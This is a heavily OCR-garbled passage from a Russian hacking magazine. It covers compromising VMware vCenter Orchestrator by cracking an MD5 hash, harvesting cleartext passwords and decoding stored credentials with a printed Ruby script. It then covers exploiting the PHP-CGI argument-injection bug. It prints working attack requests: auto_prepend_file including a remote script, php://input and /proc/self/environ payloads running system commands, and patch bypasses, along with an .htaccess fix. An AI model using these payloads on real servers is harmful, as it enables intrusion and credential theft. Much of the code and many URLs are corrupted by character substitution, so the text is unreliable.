ѴМыаге Ѵіг1;иа1Сеп1;ег\55І\гиі.кеу 



0(ІО)-ОАУѴиіЫЕРАВіиТІЕ$ 



Всегда есть вероятность встретить необновленную цель, поэтому 
не стоит сбрасывать со счетов уязвимости продукты ѵСепІег, 
датированные 2009-2010 годами: 

• ЬіЦу/К5НіР1 — уязвимость в веб-приложении Е5Х, позволяющая 
выкачать образы виртуальных машин; 

• Ьіиѵ/зѴѵРсА — уязвимость в ЭеИу, которая позволяет читать 
файлы с ѴМѵѵаге ѵСепІег; 

• ЬіЦу/КУѵѵІіАВ — сканирование недоступных для атакующего 
портов, например во внутреннем периметре; 

• ЫЦу/К98Уду — уязвимость в Ѵігіиаі Аррііапсе Мападетепі 
позволяет выполнить локальному или аутентифицированному 
удаленному пользователю произвольный код. 

Кстати, эксплойты для данных уязвимостей также присутствуют 
в комплекте ѴА5Т0. 




Уже кое-что! 



Соответственно, если мы организуем МІТМ-атаку с помощью 
АРР-5РООРІМ0, то мы сможем перехватывать трафик между сервером 
и административной рабочей станцией. Кстати, ІР-адреса админи- 
страторов и их логины по-прежнему можно узнать из файла про- 
файлера. Конечно, мы можем подменить 551-сертификат (саіп умеет 
делать это без проблем), и тогда мы расшифруем трафик без хищения 
ключа, но в этом случае администратор увидит предупреждение о не- 
верном 551-сертификате. А если мы похитили ключ — администратор 
ничего не увидит, поскольку сертификат будет верным. То есть такая 
атака более хитрая и скрытная. 

ѴМѴѴАРЕ ѴСЕМТЕР 0РСНЕ5ТРАТ0Р 

А ведь на сервере с уСепІег есть еще одна чудесная вещь, которая 
идет бесплатным довеском и устанавливается по желанию, — это 
«Оркестратор». Еще один интерфейс управления, в этот раз самим 
«Центром». Это целый «фреймворк» для разработки и автоматизации 
различных процессов в виртуальной инфраструктуре. Крутая штука. 
Изучая файловую систему, я наткнулся на следующий файл: 

Іі1;1;р : //1;аг§е1: : 9084/ѵсі/сІоыпІоасІ/ 

Рго§гат б1е5\ѴМыаге\Іп-Рга5І;гис1;иге\0гсІіе5І;га1;ог\ 
сопб§ига1:іоп\]е1:1:у\е1:с\ра55ысІ . ргорег1;іе5 

В нем содержится некий М05-хеш. Очевидно, что там запрятан 
пароль от административной учетной записи в этот самый «Оркестра- 
тор». Что тут можно сказать? Использовать М05 без соли — это не- 
безопасно. Вот и сейчас мы очень быстро получили пароль. 

Используя полученный пароль, мы вошли в систему через веб- 
интерфейс «Оркестратора». Удобно, мило, симпатичный дизайн, но 
нам нужно больше. Поковырявшись, мы заметили, что для управления 
виртуальной инфраструктурой используется тотже ѵСепІег-сервер, 
а значит, «Оркестратор» должен уметь в нем аутентифицироваться и в 
настройках лежит пароль. 

НТМЕ-код страницы, где указывается пароль, меня очень по- 
радовал — пароль там отображался в открытом виде, как есть, хотя 
визуально, в браузере, он прятался за звездочками. 

Кроме того, я нашел там пароли от почтового аккаунта, от домен- 
ных учетных записей и от прочих вещей, которыми «Оркестратор» 
должен уметь пользоваться. Прямо менеджер паролей для хакера :). 
Понятно, что вся система была успешно взломана, причем не только 
виртуальная, но и контроллер домена, а значит, всё, что там было. 

МОАРРРРРР[ 

Казалось бы, всё, но есть еще одна деталь. Ты мог обратить внимание, 
что «Оркестратор» хранит пароли в открытом виде, а не в виде хеша. 
Можно поискать, где именно он их хранит на диске. Покопавшись не- 
много, я нашел это место: 
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Содержимое злосчастного файла 



Слайд Клаудио с конференции ВІаск Наі ;-) 



Попытка найти свое счастье... 
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ѴА5Т0Ѵ5ѴСЕМТЕР 







ѴА5Т0 — набор плагинов Меіазріоіі для пентеста ѴМѵѵаге. Наиболее интересные 

и актуальные функциональные модули: 

• ѵтаѵѵаге_Іодіп — брутфорс паролей для учетной записи. Обычно логин, либо гооі, 
либо ѵѵтѵѵаге (зависит от того, что брутфорсим). 

• ѵтѵѵаге_5е55Іоп_гі(Іег — прокси-сервер для ѵЗрИеге, позволяющий на лету 
подменять значения 5Е5510М_10 в трафике. 

• ѵтѵѵаге_ѵег5Іоп — грамотно детектит версию ѴМѵѵаге по баннерам и отпечаткам. 

• ѵшѵѵаге_ѵіІигкег — модуль, позволяющий в случае МІТМ модифицировать 
трафик от сервера к клиенту, внедрив путь к обновлению клиента на СВОЙ файл. 

В результате клиент дернет этот файл себе и запуститего. 



: //1;аг§е1; : 9084/ѵсі/сІоыпІоасІ/ 

Рго§гат Рі1е5\ѴМыаге\Іп-Рга5І:гис1;иге\0псІіе5І:га1:ог\ 
арр-5егѵег\5егѵег\ѵто\соп-р\р1и§іп5\ѴС.хт1 

Пароль был все-таки чем-то зашифрован. Однако, судя по формату 
закодированной строки, это шифрование обратимо. Более того, по- 
хожие пароли выглядят в зашифрованном виде очень похоже. 

<?хт1 ѵег5Іоп="1.0" епсосІіп§="ІЯР-8" 5І;апсІа1опе="уе5"?> 

< V і г 1; и а 1 - і п -Р г а 5 1; г и с 1; и г е - Іі о 5 1; 5 > 

< ѵі г1;иа 1 - і п-Рга 5І: ги сРи ге - І105І; 

хт1п5:х5І="ІтІ:1:р://ыыы.ы3.ог^/2001/ХМІ5сІіепіа-іп5І:апсе" 

х5І:1:уре="Ѵіг1:иа1Сеп1:егНо5І:"> 

<епаЫесІ>1:гие</епаЫесІ> 

<иг1>Іі1;1;р5 ://пеы-ѵіг1;иа1-сеп1:ег-Ііо5І::443/5СІІ«/иг1> 
<асІтіпІ5І;га1:ог-и5егпате>ѵтыаге</асІтіпІ5І;га1;ог-и5егпате> 
<асІтіпІ5І;га1;ог-ра55ЫОГСІ>000а506275767Ь74786Ь383а4а60Ье76786 
4740329сІ5-Рс-Р324ес7-Рс98Ые0ааее-Р </асІтіпІ5І:га1:ог-ра55ыогсІ> 
<ра1:1:егп>%и</ра1:1:егп> 

< / V і г 1; и а 1 - і п -Р г а 5 1: г и с 1; и г е - Іі о 5 1: > 

< / ѵі ГІ; иа 1 - і п-Рга 5І; ги сР и ге - І105І; 5 > 

Еще интересный файл — С:\Ргодгат РіІе5\ѴМѵѵаге\ІпІ'га5ІгисІиге\ 
0гсРіе5ІгаІог\арр-5егѵег\5егѵег\ѵппо\сопІ'\ѵппо.ргорігІіе5. Тут таким 
же способом закодирован пароль от СУБД. Осталось разобрать суть 
метода кодирования и понять, верна наша догадка или нет. Тут в дело 
вступает мой друг и коллега, а по совместительству еще и игрок СТР- 
команды РееіМоге — Александр Миноженко. Для него такие задачки 
как два пальца... :) С одного взгляда он определил, что первые два 
байта описывают длину всего пароля, а далее идет кодированное 
представление. Саша просто декомпилировал Заѵа-класс «Орке- 
стратора», отвечающий за сохранение пароля, и разобрал алгоритм 
кодирования. Суть проста: берем длину пароля, затем кодируем в хеке 
каждый байт пароля, добавляя к нему номер позиции байта (начиная 
с нуля). Таким образом, закодированный «РаззѵѵогсІОІ.» выглядит как: 



000а506275767Ь74786Ь383а4а60Ье767 

864740329с15-Рс-Р324ес7-Рс98Ые0ааее-р 

Саша написал декодер (на Руби): 

# Закодированная строка 

ра55 = "000а506275767Ь74786Ь383а4а60Ье767 

864740329с15-Рс-Р324ес7-Рс98Ые0ааее-р" 

# Считаем длину 

Іеп = (ра55[0. .2] .ІІО І # Первые три символа - длина п ароля 
епер азБ = ра55[3. . -1] .5сап(/.{2}/) 

# Разбиваем Ііех-строку на байты 

сІес разБ = (0. . .Іеп) .соііесі: сіо | і | 

Ьу1іе = епс_ра55[ і] # Переводим Ііех в целое число 

Ьу1іе -= і # Вычитаем позицию байта и получаем 

# раскодированное з н ачение 

Ьуііе.сііг 

епсі 



# Результат - чистый пароль: "Ра55ыогсІ01 . " 
ри1і5 " Раз зыогсі: # ІсІес_разз.іоіпП>" 

Таким образом, атака сводится к использованию нашего 0-дэя для 
чтения файла и второго — для раскодирования паролей из считанных 
файлов. И опять получаем полный доступ к ѵСепІег. За несколько 
секунд, ведь уже готов соответствующий модуль для МеІазрІоіС 

ФИНАЛ 

Как видишь, 0-дэи бывают простыми, но очень опасными. Конеч- 
но, провести атаку было бы намного сложнее, если бы админи- 
страторы фильтровали доступ с помощью файрвола, ограничив 
доступ к административным портам. Но до этого додумываются 
далеко не всегда. Защита виртуальной инфраструктуры — дело 
не одной минуты. 

На этом все, не болейте! 



► -«'Ей СІШІЪШ "1ЕЙИ&СІ ^ 
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Админская учетка от ѵСепІег наша! 



Настройки доступа к ѵСепІег 
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ГОЛОСУЙ ЗА СВОЮ ЛЮБИМУЮ МАШИНУ! 

-к 



ВЕ8Т САВ8 

2013 



□ 

Мы за честные 

выборы! 



Реклама 



ТОЛЬЮ для ЧИТАТЕЛЕЙ ЖУРНАЛА 

СЛЕДИ ЗА АНОНСАМИ 



ФПРСПИІІ 



Метдународное голосование за лучшие автомобили 2013 в конкурсе ВЕБТ САНБ. 




взлом 



РаіОгІгаіОг.пате) 




СТАРАЯ ПЕСНЯ О ГЛАВНОМ 



МЕГАУЯЗВИМОСТЬ 
В РНР-С6І 

На сегодняшний день, несмотря на 
укрепление позиций своих конкурентов, 

РНР остается самым популярным языком 
для разработки веб-приложений. Вместе 
с тем старый добрый РНР продолжает 
пользоваться популярностью у взломщиков. 
Причем если раньше под их прицел попадали 
уязвимые РНР-скрипты, то сейчас все чаще 
— баги самого интерпретатора. 




Возможность выполнения кода первые часы была на сайте крупного хостера 



ІОБРАТНАЯ СТОРОНА РНР 

За последние несколько месяцев сообщения о все новых уязви- 
мостях в РНР перестали вызывать удивление, а некоторые баг- 
репорты иначе как курьезными не назовешь. Одна из последних 
уязвимостей является, пожалуй, самой серьезной в истории РНР, 
так как позволяет выполнить код на любом сервере, где РНР на- 
строен для работы по интерфейсу СОІ. Давай разберемся, откуда 
растут ноги этого бага и каким образом мы можем им воспользо- 
ваться. 



КАК ЭТО БЫЛО 

В январе 2012 года голландская команда ЕіпсІЬагеп принимала 
участие в МиІІсоп СТР, очередном для себя сарІиге-іЬе-Лад- 
соревновании. В ходе решения одной из задач парни случайно об- 
наружили странную уязвимость в РНР, благодаря которой впослед- 
ствии и выиграли, изменив результаты общего зачета. Выяснилось, 
что организаторы МиІІсоп такой уязвимости не задумывали, — это 
был О-бау-баг в РНР. Через несколько дней ЕіпбЬагеп отправили 
разработчикам РНР сообщение об уязвимости вместе с рекомен- 
дуемым патчем. Казалось бы, бери — не хочу. Однако в РНР решили 
пойти по своему пути и были впоследствии за это наказаны. 

С момента сообщения об уязвимости прошло три месяца, 
а патча все не было. И вот в один прекрасный день на сайте 
геббіЕсот появилась ссылка на внутренний тикет баг-трекера 
РНР, по непонятным причинам оказавшийся в публичном доступе. 
В нем обсуждался один из векторов атаки, который позволял 
просматривать исходный код любого РНР-скрипта, работающего 
через С6І. ЕіпбЬагеп ничего не оставалось, как опубликовать 
информацию об уязвимости, так и не дождавшись выхода патча. 
Причем в их сообщении также говорилось о том, что баг позволял 
не только просматривать исходники скриптов, но и выполнять 
произвольный РНР-код. Хотя ЕіпбЬагеп не опубликовали готовый 
вектор для выполнения кода, каждый, кто внимательно прочитал 
абѵізогу, мог легко догадаться, что для этого требовалось. 

АНАТОМИЯ уязвимости' 

Прежде чем начать разбор уязвимости, необходимо сказать пару 
слов о работе РНР через С6І. Вообще существует несколько спо- 
собов подключения РНР к веб-серверу АрасЬе. Самый популярный 
метод реализуется с помощью модуля тоб_рЬр, который позволяет 
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РНР: старая песня о главном 
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Умный бэкдор фиксит уязвимость, размещая .Массезз 



РНР и АрасЬе взаимодействовать друг с другом в рамках одного 
процесса. Другой способ осуществляется посредством ССІ (Соттоп 
баЕеѵѵау ІпЕегІ'асе). ССІ — это порядком устаревший интерфейс, ис- 
пользуемый для связи внешней программы с веб-сервером, причем 
такая программа может быть написана на любом языке. В режиме 
С6І для каждого запроса веб-сервер запускает отдельный процесс, 
что весьма негативно отражается на производительности. Именно 
поэтому на большинстве серверов с АрасЬе используются более 
производительные варианты: тоб_рЬр или РазЕСбІ. 

Итак, для работы АрасЬе и РНР в режиме С6І необходимо ис- 
пользовать следующие параметры конфигурации веб-сервера: 

0р1:іоп5 +ЕхесС6І 

АсІсІНапсІІег с§і-5сгір1: .рбр 
АсЫоп с§і-5сгір1; /ра1:Іі/1;о/рІір-с§і 



СбІ-обработчику. АрасЬе все делает в точности, как описано в РРС: 
здесь его не в чем упрекнуть. А какие именно данные ждет на вход 
обработчик РНР-С6І? Интересный вопрос. 

В 2004 году не кто иной, как Расмус Лердорф, он же отец- 
основатель РНР, предложил убрать из исходников С61-обработчика 
следующий код: 

і-р (^е^епѵГ$ЕКѴЕК_$ОРТ1лІАКЕ") 

II ^е1:епѵГ$ЕКѴЕК_МАМЕ") 

II §е1;епѵ("САТЕ1лIАУ_INТЕКРАСЕ") 

II ^е1:епѵГКЕ0иЕ5Т_МЕТН0Р")) { 

с е і = 1; 

} 



і-р(!с?і) ?е1:ор1:(. . .) 

Эти условия якобы мешали ему тестировать интерпретатор. 

На просьбу к разработчикам напомнить, зачем вообще этот код 
нужен, видимо, никто не откликнулся, после чего данный код был 
убран. Кроме того, никто не вспомнил, что разработчиками веб- 
сервера не было реализовано экранирование символа «-» перед 
передачей параметров в С61-бинарник. Возможно, это бы прояс- 
нило суть присутствующих проверок, а именно то, что удаленный 
из исходников код представлял собой защиту против подобного 
поведения веб-сервера: в режиме С6І РНР он попросту не пар- 
сил зЕсІіп-параметры, предварительно определив свой режим 
запуска и осуществляя соответствующую проверку на наличие 
в переменных окружения значений, характерных для окружения 
веб-сервера. 

Стандартная функция языка Си деЕорЕО, используемая в дан- 
ном коде, разбирает аргументы командной строки. Ее аргументы 
агдс и агдѵ являются счетчиком и массивом аргументов, которые 
передаются функции таіпО при запуске программы. Элемент агдѵ, 
начинающийся с «-» (и не являющийся «-» или «--»), считается 
опцией. Отсутствие экранирования символа «-» в результате об- 
работки запроса веб-сервером и заглушки при обработке потока 
с 5Т0ІМ обработчиком СОІ, приводит к возможности запустить 
обработчик с какой-либо поддерживаемой им опцией. 

«Баг апача», — скажешь ты, но будешь неправ, так как на самом 
деле это фича. Все эти восемь лет любой сервер с РНР-С6І мог быть 
легко взломан с использованием лишь адресной строки браузера. 



Такая конфигурация АрасЬе определяет, что для обработки 
запроса пользователя веб-сервер выполнит программу, путь до 
которой указан в директиве тосІ_асЕіоп. Причем аргументы для 
запуска приложения генерируются самим веб-сервером. Один из 
наиболее важных аргументов — значение переменной окружения 
5СР1РТ_Р11ЕМАМЕ, в которой отражается полный путь до скрипта, 
к которому обратился пользователь. Если юзер передал какие- 
либо аргументы для скрипта в своем запросе, то они передаются 
через стандартное устройство ввода зЕсІіп. Вывод же данных по 
результату выполнения операции, как ты, наверное, уже дога- 
дался, происходит в стандартное устройство вывода зЕсІоиЕ Если 
абстрагироваться, то получается, что наш браузер напрямую пере- 
дает данные в зЕсІіп бинарного приложения на удаленном сервере. 

Суть огромного количества уязвимостей заключается в некор- 
ректной обработке системой данных, полученных от пользователя. 

А в случае с ССІ за обработку данных, поступающих в зЕсІіп, отвечает 
сам веб-сервер. Но как именно он обрабатывает данные, поступаю- 
щие от пользователя? Настало время обратиться к документации 
и понять, каким же все-таки образом преобразуются данные на пути 
от строки в браузере до попадания в устройство ввода зЕсІіп. 

Согласно спецификации ССІ РРС, если строка запроса, то есть 
данные после знака «7» в СІРІ-адресе, не содержит неэкраниро- 
ванный символ «=», то веб-сервер должен считать такой запрос 
поисковым, разбивать строку запроса на символ «+» (экранирован- 
ный пробел) и отправлять полученные ключевые слова через зЕсІіп 
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Фейсбук с помощью фейковой уязвимости ищет таланты 



Все же удивительно, что информация об уязвимости появилась 
спустя столько времени. 

эксплойты" 

Итак, уязвимость позволяет передать в рЬр-сді любые параметры, 
а их у него много, например: 

• 5 — показывает исходный код скрипта; 

• п — отключает использование директив из рЬр.іпі; 

• Т <п> — запускаетскриптп количество раз; 

• с1Ѵоо[=Ьаг] — устанавливаетили перезаписываетзначения 
директив из рЬр.іпі. 

Необходимо также сказать о параметре -г — он позволяет 
выполнять РНР-код напрямую, однако разработчики ограничили 
использование данной возможности в С61-версии интерпретатора. 
Впрочем, это никак не мешает выполнению произвольного кода, 
так как существует другой способ. Но начнем, пожалуй, с более 
«безобидного» вектора. 

В1АСКВ0Х7М0РЕ!, 

Речь идет о показе исходного кода скрипта. Для этого достаточно 
сделать запрос вида Ьир://5ІІе.сот/іпсІех.рЬр?-5, и РНР без боя 
выдаст все твои секреты, любезно сделав подсветку синтаксиса. 
Именно этот вектор стал самым массовым, так как позволял легко 
определить наличие уязвимости. Когда появились сообщения 
об этом баге, первым делом я отправился проверять его на своем 
блоге. И, как ни странно, он прекрасно работал, причем на любом 
сайте моего хостера. В течение суток можно было, скажем, легко 
получить данные для подключения к базе данных не говоря уже 
о выполнении кода. 

ВСЕ СОБСТВЕННОЙ ПЕРСОНОЙ 

Итак, каким образом можно выполнить код, если параметр -г 
недоступен? Все просто, ведь у нас есть возможность устанавли- 
вать значения любых директив конфигурации РНР, включая аиІо_ 
ргерепс1_П1е и аиІо_аррепсІ_ПІе, которые позволяют автоматиче- 
ски подключать указанный файл при выполнении любого скрипта. 
Чтобы подключить РНР-сценарий, расположенный на нашем 
сервере, необходимо также установить значение Оп для директи- 



вы аІІоѵѵ_игІ_іпсІисІе, которая на большинстве серверов отклю- 
чена по умолчанию, тем самым запрещая подключение внешних 
скриптов по ІІРІ. И наконец, чтобы нам не мешали подводные 
камни вроде ВиЬозіп ракЬ, призванные усилить защиту РНР, 
используем флаг ’-п'. В этом случае РНР будет работать с дефолт- 
ными настройками рЬр.іпі, а значит, не загрузит нежелательные 
для нас расширения. В итоге конечный вектор будет выглядеть 
следующим образом: 

Іі1;1;р://5І1:е. сош/іпсіех. рI^р?-п+-сIа11оы_иг1_іпс1исIе%З^Оп+- 
Йаиіо_щ:;щепгі_Ш,е%ЗШ1іір1//еуі1^^ш 

Еще более удобный способ заключается в использовании 
внутреннего потока рЬр://іприІ, позволяющего получить доступ 
к необработанным Р05Т-данным. Используя все туже директиву 
аиІо_ргерепсІ_ПІе вкупе с рЬр://іприІ, можно выполнять код без 
обращения к внешним ресурсам. Для этого Р05Т-запрос должен 
иметь следующий вид: 

Р05Т /іпсіех. рІір?-п+-сІа11оы_иг1_іпс1исІе%ЗООп+- 
сіаи1;о_ргерепсі_б1е%30ріір%3а%2-р%2бпри1: НТТР/1 . 1 

Но5Іі: 5І1:е.сот 

Соп1;еп1;-Туре: арр1іса1;іоп/х-ыыы--Рогт-иг1епсосІесІ 

Соп1:еп1:-Іеп^1:Іі : 28 

Соппесіііоп: сіозе 



<?рІір 5у5І:ет("ипате -а"); ?> 

НЕИНПУТОМ ЕДИНЫМ 

Последний вектор атаки основывается на все том же способе 
с автоматическим подключением сценария, однако вместо исполь- 
зования потоков ввода/вывода производится инжект кода в /ргос/ 
зеіі'/епѵігоп. Данный файл, вернее символическая ссылка, являясь 
частью виртуальной файловой системы РгосРЗ, содержит значения 
переменных окружения текущего процесса. Это как раз то, что 
нужно: ведь в режиме ССІ для каждого НТТР-запроса создается 
отдельный процесс. РгосРЭ можно встретить в любой *піх-системе, 
за исключением РгееВРО, тем не менее доступ на чтение /ргос/ 
зеіі'/епѵігоп есть не всегда. При его наличии для успешного вы- 



РНР-С6І В ЦИФРАХ 



234 076 попыток взлома через баг 
в РНР-С6І было зафиксировано 
в течение двух суток после появления 
первых сообщений об уязвимости 
АрасИе-модулем тосі_5есигіІу, 
установленным на хостинге 
ОгеатНозІ. 

Стефан Эссер в своем твиттере глумится над патчем 
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Тіі« &есигі1>' еіііеі:;зеису геіваге ю Ях ІІіе РНР СС1 
БСЕ (іЬлІ 1 ѴВ& Гйг сіауя...) аае& паі йх 
апуііііп^аі ай. 



^н*ыг ■№ иши и *риим 



ЕЕШ 

• ьіыѵ/іирщаѵ — 
адвизори от 
команды ЕіпсІЬагеп; 

• Ьіиѵ/Зиѵѵ50К — 
внутренний тикет 
обагевРНР-ССІ, 
оказавшийся 

в паблике; 

• ЬШу/аодНОР — 

СОІ РРС; 

• ЫЩ/КзУауѴУ — 

то самое злосчастное 
сообщение Расмуса 
Лердорфа 2004 года. 



ІШІ1 

Технология РазІССІ, 
основанная на С6І, 
вместо стандартных 
устройств ввода/ 
вывода зісііп и 5(сІои( 
для взаимодействия 
с веб-сервером 
использует ІІМІХ- 
сокеты или протокол 
ТСР/ІР. Именно по 
этой причине РазІСбІ 
уязвимости не 
подвержен. 
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РНР: старая песня о главном 



полнения кода достаточно подключить /ргос/зеіі'/епѵігоп через 
аиІо_ргерепсІ_ЛІе и поместить злой код, например в ІІзег-АдепІ: 

СЕТ /Іпс1ех.р1ір?-п+-с1а11оы_иг1_іпс1ис1е%300п+- 
сІаи1:о_ргерепсІ_1і1е%ЗР%2-рргос%2-р5е1-Р%2-Репѵігоп НТТР/1 . 1 

Но5Іі: зіііе.сот 

Узег-А^еп-Ь: <?рІір 5уз1;ет("ісІ"); ?> 

Соппесіііоп: сіозе 

ПАТЧЕННЫЙ ПАТЧ 

Действия разработчиков РНР по ходу всей этой истории выглядят до- 
вольно странно и отчасти комично. Мало того что им не хватило трех 
месяцев для устранения бага, автором которого по иронии судьбы 
стал сам основатель языка, так еще они умудрились выпустить баж- 
ный патч, который можно было легко обойти, слегка видоизменив 
запрос. Первоначальный патч содержал следующие строки: 

(*сІесосІесІ_диегѵ_з1:гіп^ == && 

з1;гсІіг(сІесосІесІ_диегу_з1;гіп§^ ' = ') == N1111) { 

зкір_^е1:ор1: = 1: 

} 

Данный код проверяет строку запроса: если первый символ 
является дефисом и отсутствует «=», то РНР не будет парсить пара- 
метры в режиме С6І. Однако обрати внимание, что проверяется уже 
раскодированная строка запроса. Это значит, что возможен обход 
патча, если в запросе присутствует символ «=» в ОРІ-кодировке 
(%3с1). Иначе говоря, патч никак не повлиял на вектор для выпол- 
нения кода, поскольку там и так присутствует %3с1, а для просмотра 
исходного кода потребовалось немного изменить запрос: /?-з+%Зс1. 

Во второй версии патча сІесосІесІ_диегу_зІгіпд заменили на 
диегу_зІгіпд, однако и эта попытка оказалась неудачной, так как 
был обнаружен еще один недочет. Дело в том, что на некоторых 
серверах используется неправильная обертка для запуска рЬр-сді. 
Например, хостер ОгеатНозІ, на котором был организован тот 
самый МиІІсоп СТР, как раз такую обертку и использовал: 

#!/Ьіп/зІі 

ехес /сііі/с§і-зуз1;ет/ріір5. с§і $* 

Ошибка здесь в том, что параметры в рЬрб.сді передаются с по- 
мощью $* без двойных кавычек, то есть если первым символом 
строки запроса вместо дефиса будет пробел, то патч снова окажет- 
ся неэффективным. Таким образом, при использовании непра- 
вильного промежуточного зЬ-скрипта для передачи параметров 
в рЬр-сді патч окажется бессильным перед запросом вида /?+-з. 

В итоге РНР так и не представили нормального решения про- 
блемы. Самый простой способ полностью залатать дыру — исполь- 
зовать .Ыассезз со следующими правилами: 

Кеыгі1:еЕп§іпе оп 
КеыгіІіеСопсІ %{^^ЕКУ_5ТКINе} 

КеыгіІіеСопсІ %{^^ЕКУ_5ТКINе} %2сІ1\- [МС] 

Кеыгі'беКиІе . ? - [Р^ І] 

Данный набор правил реализует логику: «если в строке запро- 
са отсутствует символ «=», но есть дефис, то веб-сервер должен 
вернуть ошибку с кодом 403 (РогЬісІсІеп)». 

ЗАКЛЮЧЕНИТ 

Несомненно, за последние несколько лет РНР претерпел суще- 
ственные изменения, вырос в один из самых мощных языков для 
создания веб-приложений. Однако последние уязвимости дела- 
ют очевидным, что безопасность интерпретатора так и осталась 
на прежнем уровне, и баг в РНР-С6І идеальное тому подтверждение. 
Если разработчики будут продолжать в том же духе, не исключено, 
что в скором времени нас ждут еще более серьезные уязвимости. ^ 



ТОП-5 САМЫХ НАШУМЕВШИХ БАГОВ В РНР 



УЯЗВИМОСТЬ ПРИ ЗАГРУЗКЕ ФАЙЛОВ 

Адвизори: Ыиу/МВтд52 
Уязвимая версия: РНР < 4.3.8, РНР < 5.0.1 
Автор: Стефано ди Паола, 2004 год 
Уязвимость позволяла загружать файлы с произвольным расширением 
в любые директории, если в имени загружаемого файла присутствовал 
символ «_». Баг не получил широкого распространения, так как вовремя 
был выпущен патч. 

УЯЗВИМОСТЬ <^2ЕМ0_НА5Н_0Е1.КЕУ_0К_т0ЕХ^^ 

Адвизори: Ыиу/сІоі41ІА 
Уязвимая версия: РНР < 4.4.3, РНР < 5.1.3 
Автор: Стефан Эссер, 2006 год 
Печально известная 2Н0К01-уязвимость в свое время затронула такие 
продукты, как Зоотіа, рИрВВ, ѴѴогсІргезз и ѵВиІІеІіп. Ошибка заключалась 
в неправильной проверке ключей хеш-таблицы, содержащей указатели 
на значения переменных. Благодаря багу можно было сохранить 
переменные в локальном пространстве имен, несмотря на вызов ипзеіО. 

При передаче во входящих данных предварительно вычисленного хеша 
от имени нужного ОРС-параметра можно было обойти ипзеіО, что в итоге 
нередко приводило к локальным/удаленным инклудам. 

УЯЗВИМОСТЬ в РНР-ФУНКЦИЯХ для РАБОТЫ 
с ФАЙЛОВОЙ СИСТЕМОЙ 

Адвизори: Ыиу/ЗірЗММ 
Уязвимая версия: РНР < 5.3 
Авторы: команда ІІ5Н, 2009 год 
После обнародования информации о данной уязвимости сеть захлестнула 
волна ІРІ- и РРІ-атак. Благодаря этому багу при проведении инклудов 
появилась возможность избавиться от пиІІ-байта. Напомню, что при 
включенной директиве гпадіс_диоІе5_дрс пиІІ-байт экранируется, что 
затрудняет реализацию ІРІ-РРІ-атак. Цель использования «ядовитого» 
байта — отбросить расширение; с помощью нового способа этого можно 
было добиться с помощью последовательности слешей и точек, длина 
которой выходила за пределы значения МАХРАТНІЕМ. 

УЯЗВИМОСТЬ ПРИ СЕРИАЛИЗАЦИИ ДАННЫХ СЕССИЙ 

Адвизори: Ьі(.Іу/К02ІѴг 
Уязвимая версия: РНР < 5.2.14, РНР < 5.3.3 
Автор: Стефан Эссер, 2010 год 
В механизме сериализации сессий присутствовала ошибка, из-за которой 
было возможно внедрение в сессию произвольных сериализованных 
данных. Иными словами, уязвимость позволяла передать в ипзегіаІііеО 
любые данные, что, в свою очередь, могло привести к вызову произвольного 
метода ранее инициализированного класса. Например, если веб-приложение 
работало на 2епс1 Ргатеѵѵогк и неправильно обрабатывало входящие данные 
перед их использованием в _5Е5510М, то благодаря уязвимости можно было 
выполнить произвольный РНР-код через один из методов 2Р. 

ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО КОДА 

Адвизори: ЫЫу/ЕЬрОдН 
Уязвимая версия: РНР 5.3.9 
Автор: Стефан Эссер, 2012 год 
Начиная с версии 5.3.9 в РНР появился новый параметр конфигурации — 
тах_іприІ_ѵаг5, цель которого — ограничить количество входящих 
параметров и тем самым защитить РНР от НазИ СоІІізіоп 0о5, отказа 
в обслуживании путем передачи большого количества бРС-параметров. 
Однако в коде была допущена ошибка, что позволяло выполнить 
произвольный код на целевой системе путем создания фейковой хеш- 
таблицы. Для этого требовалось отправить запрос, в котором количество 
параметров равнялось тах_іприІ_ѵагз (по умолчанию 1000). 
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взлом 



Дмитрий «01д1» Евдокимов, Оідііаі Зесигііу (іѵѵіиег.согп/еѵсіокітоѵсіз) 



Х-Тооіз 

СОФТ для ВЗЛОМА и АНАЛИЗА БЕЗОПАСНОСТИ 




Автор: 

ѴѴаупе Ниапд 

икі: 

ѵѵѵѵѵѵ.сігіѵезріоіі.огд 

Система: 

*піх/ѵѵіп 





ОРІѴЕ-ВУ ООѴѴМІОАО АТАКА 
СВОИМИ РУКАМИІ 

Огіѵезріоіі был впервые представлен на 
хакерской конференции ВІаск Наі ІІ5А 2010, 
а затем и на ОЕР СОМ 18. Он представляет со- 
бой расширение для теіазріоіі-фреймворка, 
предназначенное для реализации бгіѵе-Ьу 
боѵѵпіоасі атаки. На всякий случай напомним, 
что бгіѵе-Ьу боѵѵпіоасі сплоиты — то самое зло, 
которое хакеры обычно встраивают в ЫтІ- 
страницу с помощью іі^гате, и при этом от 
жертвы, посещающей такой сайт, не требуется 
никаких телодвижений — достаточно всего 
лишь непропатченного софта. Примером такой 
атаки может служить атака под названием 
Аигога, которая использовала 0-сІау в ІЕ 
(СѴЕ-2010-0249). Для работы именно с такими 
эксплойтами, найденными в дикой природе, 
и предназначен данный проект. Немного по- 
трудившись, можно сделать и свой собствен- 
ный ехріоіі-раск на основе имеющихся и до- 
бавленных в Меіазріоіі эксплойтов. Благодаря 
самому фреймворку в Меіазріоіі добавляется 
несколько полезных команддля обфускации 
боевой нагрузки и проведения таргетирован- 
ной атаки на конкретный браузер. 

Подробнее об этом фреймворке мож- 
но узнать из презентации «Огіѵезріоіі: 
Сігситѵепііпд Аиіотаіесі апб МапиаІ Оеіесііоп 
оі" Вгоѵѵзег Ехріоііз» ( зІісІезІіа.ге/аОгрНб ). Также 
хочется отметить, что к проекту приложил руку 
и наш соотечественник — известный хакер 
Федор Ярочкин. 



ШВЕЙЦАРСКИЙ НОЖ НА РУВУ 
ДЛЯ РЕВЕРСЕРОВІ 

МЕТА5М — это кроссархитектурный ассем- 
блер, дизассемблер, компилятор, линкер и от- 
ладчик в одном флаконе! Проект уже давно 
заслужил уважение в хакерском сообществе 
и часто появляется на хакерских конференци- 
ях (55ТІС, Ьаск.Іи, НІТВ, РЕсоп). Весь проект 
написан на чистом РиЬу. На данный момент 
поддерживаются следующие архитектуры: 
Іп^еІ ІА32 (16/32/64 Ы^з), МІР8 и РРС. 

В разработке: АРМ, СеІІ и 5РАРС. 

Но самая вкусная его особенность: 
МЕТА5М разработан так, что позволяет мак- 
симально просто добавлять новые архитек- 
туры, и при желании его возможности всегда 
можно расширить. Также проект поддержи- 
вает множество форматов файлов: 

• Раѵѵ (для шелл-кодов); 

• М2,РЕ/СОРР(32и64ЬіІз); 

• ЕЕР(32и64ЬіІз); 

• МасЬ-0 (не полностью); 

• ІІпіѵегзаІВіпагу; 

